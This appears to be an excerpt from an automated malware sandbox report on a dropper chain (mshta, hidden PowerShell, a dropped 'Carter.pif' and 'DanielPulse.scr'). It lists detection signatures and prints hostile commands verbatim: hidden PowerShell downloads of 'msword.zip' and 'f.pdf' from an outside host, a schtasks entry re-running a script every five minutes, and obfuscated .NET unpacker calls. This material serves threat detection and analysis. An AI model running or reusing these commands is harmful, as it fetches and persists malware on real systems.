              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_1hDllwdT4WVgtLtvrh9HNTiswVDrK.eJw816nOtBnQZuwusfPwdeCqpzSPc,_1hDllwdT4WVgtLtvrh9HNTiswVDrK._6VCrJCYx9STcmgqNj8H9Kfg3sUAts,_1hDllwdT4WVgtLtvrh9HNTiswVDrK._4JfBy5iKF4dHKJv3wpolEJW2Kc5aN,_1hDllwdT4WVgtLtvrh9HNTiswVDrK.fUOnaw45vUZW9wRtPzKDoSUr7wQOr,GKj04XVvJiEzT5.o4DomEaaAK3Tvn()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{B7gC3ws7qAtINRZuxsMLlEJhLdYgq[2],GKj04XVvJiEzT5.HW4WcRdB9jpgvy(GKj04XVvJiEzT5.LnW574bP2vfKev(B7gC3ws7qAtINRZuxsMLlEJhLdYgq[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { B7gC3ws7qAtINRZuxsMLlEJhLdYgq[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              .NET source code contains potential unpacker
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs.Net Code: W2w4gwDiJR1Z2UwSx8jWJmGy2ytCd System.AppDomain.Load(byte[])
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs.Net Code: _8pCaSS8opbfEaqRaxA9VTdWhd8g17 System.AppDomain.Load(byte[])
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs.Net Code: _8pCaSS8opbfEaqRaxA9VTdWhd8g17
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs.Net Code: W2w4gwDiJR1Z2UwSx8jWJmGy2ytCd System.AppDomain.Load(byte[])
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs.Net Code: _8pCaSS8opbfEaqRaxA9VTdWhd8g17 System.AppDomain.Load(byte[])
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs.Net Code: _8pCaSS8opbfEaqRaxA9VTdWhd8g17
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs.Net Code: W2w4gwDiJR1Z2UwSx8jWJmGy2ytCd System.AppDomain.Load(byte[])
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs.Net Code: _8pCaSS8opbfEaqRaxA9VTdWhd8g17 System.AppDomain.Load(byte[])
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs.Net Code: _8pCaSS8opbfEaqRaxA9VTdWhd8g17
              Suspicious powershell command line found
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 14_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,14_2_004062FC
              Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_2_05AECB26 push eax; retf 0_2_05AECB2D
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_00298B75 push ecx; ret 29_2_00298B88
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_0028CBDB push eax; retf 29_2_0028CBF8
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_0028CC06 push eax; retf 29_2_0028CBF8
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_00908B75 push ecx; ret 37_2_00908B88
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeCode function: 41_2_05702372 pushfd ; iretd 41_2_05702379
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeCode function: 41_2_05702332 pushad ; iretd 41_2_05702319
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeCode function: 41_2_057022F0 push esp; iretd 41_2_057022F1
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, OfpCuG0X22QLMT.csHigh entropy of concatenated method names: 'nYwX372KteT5t2', 'segcmNagSiz7hL', 'yb0jQST0YwMHe1', '_0RenYuPKc4bvZA', 'JZsQDAM9n6EtQO', 'nH0p3C37Fxk65v', 'wQuomVoWPHIdrS', 'KcyJvFgDlyg3yX', 'loFybsLcslp7YB', 'OqFzKE7yCCpgGL'
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, kqeFvQIpnkai8I7JJTganEHGxWh1A.csHigh entropy of concatenated method names: 'aRwUsZ42Qp2Iu55HZmFMSXPDzzjZF', 'r9VwT22LhaEvtkx68iMROo7ndw3YZ', 'jrU22mrrq7mmJu6zwT9QAgvUnX9CJ', 'V9WvHsnCndciRvznYV6E8Iiw7Ijry', 'sGZ2ry3eOxX0Kx', 'yIBnpeSQWl0II9', 'xgpfXiKspkv7Qk', '_43XjyQXj7XyIa1', 'a89z5bafQjfyZs', 'Tk551t0Ool3k8m'
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, GKj04XVvJiEzT5.csHigh entropy of concatenated method names: '_31TqwEG7d5XQHj', 'lxcCKU7qpJsmyP', 'YZYM9q6UFN8qLN', 'qbUFKJUwRHfrx0', 'yp447Ls9FeU2rB', 'v2qtSP4rX7Lk2T', '_913bZMPdi8gyo6', 'ub5OHWFnNsEeGb', 'J3wXGNI0TDWKm6', 'LnW574bP2vfKev'
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.csHigh entropy of concatenated method names: 'A8tvE0DZ8bvmGcdzUXcKpnPMdpDux', 'W2w4gwDiJR1Z2UwSx8jWJmGy2ytCd', 'ft4DTvZvc4qN6kRvp59xULzP1mvg8', 'h5DA5Rai9oL4jV2ulFHvRbWYSJygJ', 'O4KRgJLa3ckMhcPaD7WwIhODI7hWV', 'YWUQmw7KiGzjOEEcq4lQEbMvcLlhm', 'EJyK88GxspHTRmtV2qD89iF21FbSy', 'IhlkrpmLJYz1G6gP55j78Ej4gKn7F', 'm8302rRfONzkL3YJxiETt06WijQVn', 'P9l9FPyls55tddMfrIzTDmtDXAy1p'
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, 75lcEdvWjHm39L5ktP3tlqVbSoumD.csHigh entropy of concatenated method names: 'GLV28Q7RWReL58LNXG4dRIdIK2TEN', 'SqFko7T9STuWHJvrJgezXiBwfKMUK', 'W4PVwXl8ze5GoIs5LD920v8iPvDpI', 'VuiMLbYUZ5mbwdX2kA30fKD2DAOuV', 'lkt0AxMEBI88hk7IoXbH4QyieI6eA', 'lfIrGorQseyo6qZGq1AaQGw9LAMH7', 'mMD8nCbTfzppkmkizs1ZJLk6b6GTh', 'NAsi31w08xZTNd4EnIYvztAjeNjfl', 'dwTlKIVNZIbv7CCltiTquHRE8Fbjk', 'NAmq1jGo4CTjwh'
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, JbeTyT6ozehDZJ.csHigh entropy of concatenated method names: '_4qRRAkWwEHf3Zd', 'vRsh53PpGgdqA0', '_8Hq2Or18riYaIv', '_8mRH3Hyg3XD8u5', 'EdcUKUZTwxyIgi', '_6vgoIitpz9FToY', 'kF9NScHwDxQCcQ', 'ebBHLsDcmu1A20', 'sfMOP7twzn5TxB', 'TEyNm0Eygu7184'
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.csHigh entropy of concatenated method names: '_2mGh5CdvITFqIEgkpZMeXEYaYAyDB', '_9BeG36XnpwBXeXYTPZ4EKlMNJsvBQ', 'nZq2XPd9g1M2B2LsBPHPhOcwls9uQ', 'IXpGxkIWH8t4eoPAyitkJLIMPKWb6', 'w266axfymAlJYlHxOy7UD7CgTETRm', 'ImNQKUnqPr9jIMbbRrVqiJBKaucLC', 'hvtupL1aknPiuTNtO4sMyUTjVVlCG', 'LuqfnAbPcScBSkmye7C3NBjgwO957', 'qHF4AT3e2DvOntMCkk5fkm78V3UET', 'CLYFb0PcaLLnKDeZTkE3vmfjdeJfz'
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, OfpCuG0X22QLMT.csHigh entropy of concatenated method names: 'nYwX372KteT5t2', 'segcmNagSiz7hL', 'yb0jQST0YwMHe1', '_0RenYuPKc4bvZA', 'JZsQDAM9n6EtQO', 'nH0p3C37Fxk65v', 'wQuomVoWPHIdrS', 'KcyJvFgDlyg3yX', 'loFybsLcslp7YB', 'OqFzKE7yCCpgGL'
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, kqeFvQIpnkai8I7JJTganEHGxWh1A.csHigh entropy of concatenated method names: 'aRwUsZ42Qp2Iu55HZmFMSXPDzzjZF', 'r9VwT22LhaEvtkx68iMROo7ndw3YZ', 'jrU22mrrq7mmJu6zwT9QAgvUnX9CJ', 'V9WvHsnCndciRvznYV6E8Iiw7Ijry', 'sGZ2ry3eOxX0Kx', 'yIBnpeSQWl0II9', 'xgpfXiKspkv7Qk', '_43XjyQXj7XyIa1', 'a89z5bafQjfyZs', 'Tk551t0Ool3k8m'
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, GKj04XVvJiEzT5.csHigh entropy of concatenated method names: '_31TqwEG7d5XQHj', 'lxcCKU7qpJsmyP', 'YZYM9q6UFN8qLN', 'qbUFKJUwRHfrx0', 'yp447Ls9FeU2rB', 'v2qtSP4rX7Lk2T', '_913bZMPdi8gyo6', 'ub5OHWFnNsEeGb', 'J3wXGNI0TDWKm6', 'LnW574bP2vfKev'
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.csHigh entropy of concatenated method names: 'A8tvE0DZ8bvmGcdzUXcKpnPMdpDux', 'W2w4gwDiJR1Z2UwSx8jWJmGy2ytCd', 'ft4DTvZvc4qN6kRvp59xULzP1mvg8', 'h5DA5Rai9oL4jV2ulFHvRbWYSJygJ', 'O4KRgJLa3ckMhcPaD7WwIhODI7hWV', 'YWUQmw7KiGzjOEEcq4lQEbMvcLlhm', 'EJyK88GxspHTRmtV2qD89iF21FbSy', 'IhlkrpmLJYz1G6gP55j78Ej4gKn7F', 'm8302rRfONzkL3YJxiETt06WijQVn', 'P9l9FPyls55tddMfrIzTDmtDXAy1p'
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, 75lcEdvWjHm39L5ktP3tlqVbSoumD.csHigh entropy of concatenated method names: 'GLV28Q7RWReL58LNXG4dRIdIK2TEN', 'SqFko7T9STuWHJvrJgezXiBwfKMUK', 'W4PVwXl8ze5GoIs5LD920v8iPvDpI', 'VuiMLbYUZ5mbwdX2kA30fKD2DAOuV', 'lkt0AxMEBI88hk7IoXbH4QyieI6eA', 'lfIrGorQseyo6qZGq1AaQGw9LAMH7', 'mMD8nCbTfzppkmkizs1ZJLk6b6GTh', 'NAsi31w08xZTNd4EnIYvztAjeNjfl', 'dwTlKIVNZIbv7CCltiTquHRE8Fbjk', 'NAmq1jGo4CTjwh'
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, JbeTyT6ozehDZJ.csHigh entropy of concatenated method names: '_4qRRAkWwEHf3Zd', 'vRsh53PpGgdqA0', '_8Hq2Or18riYaIv', '_8mRH3Hyg3XD8u5', 'EdcUKUZTwxyIgi', '_6vgoIitpz9FToY', 'kF9NScHwDxQCcQ', 'ebBHLsDcmu1A20', 'sfMOP7twzn5TxB', 'TEyNm0Eygu7184'
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.csHigh entropy of concatenated method names: '_2mGh5CdvITFqIEgkpZMeXEYaYAyDB', '_9BeG36XnpwBXeXYTPZ4EKlMNJsvBQ', 'nZq2XPd9g1M2B2LsBPHPhOcwls9uQ', 'IXpGxkIWH8t4eoPAyitkJLIMPKWb6', 'w266axfymAlJYlHxOy7UD7CgTETRm', 'ImNQKUnqPr9jIMbbRrVqiJBKaucLC', 'hvtupL1aknPiuTNtO4sMyUTjVVlCG', 'LuqfnAbPcScBSkmye7C3NBjgwO957', 'qHF4AT3e2DvOntMCkk5fkm78V3UET', 'CLYFb0PcaLLnKDeZTkE3vmfjdeJfz'
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, OfpCuG0X22QLMT.csHigh entropy of concatenated method names: 'nYwX372KteT5t2', 'segcmNagSiz7hL', 'yb0jQST0YwMHe1', '_0RenYuPKc4bvZA', 'JZsQDAM9n6EtQO', 'nH0p3C37Fxk65v', 'wQuomVoWPHIdrS', 'KcyJvFgDlyg3yX', 'loFybsLcslp7YB', 'OqFzKE7yCCpgGL'
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, kqeFvQIpnkai8I7JJTganEHGxWh1A.csHigh entropy of concatenated method names: 'aRwUsZ42Qp2Iu55HZmFMSXPDzzjZF', 'r9VwT22LhaEvtkx68iMROo7ndw3YZ', 'jrU22mrrq7mmJu6zwT9QAgvUnX9CJ', 'V9WvHsnCndciRvznYV6E8Iiw7Ijry', 'sGZ2ry3eOxX0Kx', 'yIBnpeSQWl0II9', 'xgpfXiKspkv7Qk', '_43XjyQXj7XyIa1', 'a89z5bafQjfyZs', 'Tk551t0Ool3k8m'
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, GKj04XVvJiEzT5.csHigh entropy of concatenated method names: '_31TqwEG7d5XQHj', 'lxcCKU7qpJsmyP', 'YZYM9q6UFN8qLN', 'qbUFKJUwRHfrx0', 'yp447Ls9FeU2rB', 'v2qtSP4rX7Lk2T', '_913bZMPdi8gyo6', 'ub5OHWFnNsEeGb', 'J3wXGNI0TDWKm6', 'LnW574bP2vfKev'
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.csHigh entropy of concatenated method names: 'A8tvE0DZ8bvmGcdzUXcKpnPMdpDux', 'W2w4gwDiJR1Z2UwSx8jWJmGy2ytCd', 'ft4DTvZvc4qN6kRvp59xULzP1mvg8', 'h5DA5Rai9oL4jV2ulFHvRbWYSJygJ', 'O4KRgJLa3ckMhcPaD7WwIhODI7hWV', 'YWUQmw7KiGzjOEEcq4lQEbMvcLlhm', 'EJyK88GxspHTRmtV2qD89iF21FbSy', 'IhlkrpmLJYz1G6gP55j78Ej4gKn7F', 'm8302rRfONzkL3YJxiETt06WijQVn', 'P9l9FPyls55tddMfrIzTDmtDXAy1p'
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, 75lcEdvWjHm39L5ktP3tlqVbSoumD.csHigh entropy of concatenated method names: 'GLV28Q7RWReL58LNXG4dRIdIK2TEN', 'SqFko7T9STuWHJvrJgezXiBwfKMUK', 'W4PVwXl8ze5GoIs5LD920v8iPvDpI', 'VuiMLbYUZ5mbwdX2kA30fKD2DAOuV', 'lkt0AxMEBI88hk7IoXbH4QyieI6eA', 'lfIrGorQseyo6qZGq1AaQGw9LAMH7', 'mMD8nCbTfzppkmkizs1ZJLk6b6GTh', 'NAsi31w08xZTNd4EnIYvztAjeNjfl', 'dwTlKIVNZIbv7CCltiTquHRE8Fbjk', 'NAmq1jGo4CTjwh'
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, JbeTyT6ozehDZJ.csHigh entropy of concatenated method names: '_4qRRAkWwEHf3Zd', 'vRsh53PpGgdqA0', '_8Hq2Or18riYaIv', '_8mRH3Hyg3XD8u5', 'EdcUKUZTwxyIgi', '_6vgoIitpz9FToY', 'kF9NScHwDxQCcQ', 'ebBHLsDcmu1A20', 'sfMOP7twzn5TxB', 'TEyNm0Eygu7184'
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.csHigh entropy of concatenated method names: '_2mGh5CdvITFqIEgkpZMeXEYaYAyDB', '_9BeG36XnpwBXeXYTPZ4EKlMNJsvBQ', 'nZq2XPd9g1M2B2LsBPHPhOcwls9uQ', 'IXpGxkIWH8t4eoPAyitkJLIMPKWb6', 'w266axfymAlJYlHxOy7UD7CgTETRm', 'ImNQKUnqPr9jIMbbRrVqiJBKaucLC', 'hvtupL1aknPiuTNtO4sMyUTjVVlCG', 'LuqfnAbPcScBSkmye7C3NBjgwO957', 'qHF4AT3e2DvOntMCkk5fkm78V3UET', 'CLYFb0PcaLLnKDeZTkE3vmfjdeJfz'

              Persistence and Installation Behavior

              barindex
              Drops PE files with a suspicious file extension
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\220239\Carter.pifJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifFile created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrJump to dropped file
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\220239\Carter.pifJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifFile created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifFile created: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeJump to dropped file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\msword\msword.exeJump to dropped file

              Boot Survival

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002F59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,29_2_002F59B3
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_00285EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,29_2_00285EDA
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_009659B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,37_2_009659B3
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_008F5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,37_2_008F5EDA
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002933B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,29_2_002933B7
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
